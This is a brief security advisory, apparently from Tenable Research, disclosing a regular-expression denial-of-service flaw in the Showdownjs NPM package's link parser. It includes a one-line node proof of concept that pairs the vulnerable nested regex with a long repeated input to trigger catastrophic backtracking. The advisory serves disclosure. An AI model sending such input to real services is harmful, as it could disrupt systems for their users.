Showdownjs Denial of Service
Feb. 26, 2024, 4:01 p.m. | Evan Grant
Tenable Research Advisories www.tenable.com
A researcher at Tenable discovered an issue in the Showdownjs NPM package that could lead to a denial of service. Showdownjs' anchors subparser, which is used to parse links, contains a nested regular expression that can cause denial of service conditions when given malicious input.
Proof of Concept:
# Run the time command with node, containing the vulnerable regex expression
time node -e '/\[((?:\[[^\]]*]|[^\[\]])*)] ?(?:\n *)?\[(.*?)]()()()()/g.test("[[[[[[[[[".repeat(9999))'